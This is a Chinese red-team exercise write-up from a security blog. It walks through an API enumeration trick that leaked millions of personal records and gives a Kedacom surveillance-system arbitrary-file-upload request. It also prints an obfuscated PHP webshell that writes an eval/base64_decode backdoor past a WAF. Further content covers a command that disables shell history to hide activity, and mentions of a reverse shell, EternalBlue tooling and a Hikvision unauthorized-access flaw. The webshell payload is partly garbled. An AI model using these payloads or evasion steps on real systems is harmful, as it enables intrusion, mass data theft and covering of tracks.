2025年5月6日09:54:28已关闭评论3 views字数 1448阅读4分49秒阅读模式

前言

作为资历混子Web🐶，日常负责端茶倒水之余，浅谈下如何在如今全是大牛子环境下存活，发挥出牛马个人最大价值，Hvv巧妙Nday利用，本文仅此记录学习分享，如若有不对之处，望大佬们指正。

免责声明：

由于传播、利用Polaris本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责。仅记录学习使用。

正文

接口泄露

政务、教育行业作为最常见突破点，寻找学号，工号，弱口令进入后台，sql/文件上传等拿Webshell权限。因此会多人忽略数据泄露分.

某政X单位，注册进入后台，个人信息查询处简单fuzz一下进行后端传参校验碰撞，导致拼接替换参数造成获取X百万敏感信息。


            https://www.xxx.com/1234/qqquser/detaili?id=xxx

正常查询，替换接口如下：


            https://www.xxx.com/1234/qqquser/list?size=1


            https://www.xxx.com/1234/qqquser/detaili

缺少参数报错，得到的值为百万级。【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游


            https://www.xxx.com/1234/qqquser/exportList?xzqhcode=xxxxxx

且通过接口发现123456处为省份邮政编码，再次替换遍历接口。

重复以上操作，替换邮政编码与ID值，最终获取X百万级敏感信息。


            https://github.com/gh0stkey/HaE/
          
            https://github.com/gh0stkey/CaA/

（此处推荐插件Hae与CaA，通过数据包正则匹配高亮定位敏感信息，结合CaA收集的参数接口用于方便Fuzz）

Nday积累

往年Hvv前网上都会爆出大量Poc文档、库等，但多数都不太全。或由于漏洞敏感导致后期漏洞已下架等。建议汇总编写整理漏洞库payload自行写成验证工具效率加倍。参考Xray模板，嵌套就行。

(文章末尾整理了近年较全漏洞库)

Kedacom视频监控系统-Nday

某次攻防中碰到的Kedacom视频监控系统任意文件上传。【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

POST /pmc-bin/upload_fcgi?uploadDir=../&uploadName=
            aaa.php
           HTTP/1.1Host: Pragma: no-cacheCache-Control: no-cacheAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryContent-Length: 164----WebKitFormBoundaryContent-Disposition: form-data; name="Filedata": filename="aaa"Content-Type: application/octet-streamtest123----WebKitFormBoundary--

Content-Disposition: form-data; name=="file";filename=1<php<<<<Content-Type: image/jpg<hqiu fang guo%>?=$a=<<<   aaassasssasssasssasssasssasssasssasssasssasssssssssssssaasssassssaa;fwrite(fopen("
            ppp888.php"
          ,"a"),'<?php*asas111*/eval/*asas111*/(/*asas111*/base64_decode/*asas111*/(base64ecode/*asas111*/(base64ecode/*asas111*/($_POST/*asas111*/["a"])))/*asas111*/)/*asas111*/:')?>-----------------35803941388997298198758721635Content-Disposition: form-data; name="submit"

存在Waf，天蝎马二次编码后成功上传解析。

绕过思路综合脑图：

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游进入内网：

遇到Linux系统优先考虑禁用历史命令记录功能：

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

由于权限较低且操作系统为32位的Linux，反弹shell到VPS，可执行命令。

Tips：热门内网扫描器无法使用时，可用gogo进行内网扫描。


            https://chainreactors.github.io/wiki/gogo/

永恒之蓝：MSF反弹shell易打蓝屏，工具dll注入账号密码，编写把开RDP也加进该dll文件。


            https://github.com/abc123info/EquationToolsGUI

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游添加隧道代理，找到多网卡主机，跨网段。

海康未授权。（Yakit的Fuzz接口好用些。）【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游剩下就常规内网梭哈了，刷完收工。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

获取方式

本公众号回复【20250504】即可获取往年Poc汇总整理打包+文中脑图与工具

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

前言

免责声明：

正文

接口泄露

Nday积累

(文章末尾整理了近年较全漏洞库)

Kedacom视频监控系统-Nday

绕过思路综合脑图：

获取方式

浅析Java反序列化题目的一般思路

Vitejs漏洞复现与利用

403绕过技巧

RDP协议分析及应用场景

逆向与爆破北大*站从JS逆向到账户接管|挖洞技巧

MCP：大模型时代的USB接口

任意文件上传但JSP失效？别急，文件上传还有这些隐藏玩法！

SRC之云服务业务逻辑案例

$9000 赏金的漏洞

赏金故事 | 绕过邀请流程，获取管理员访问权限

在线咨询

微信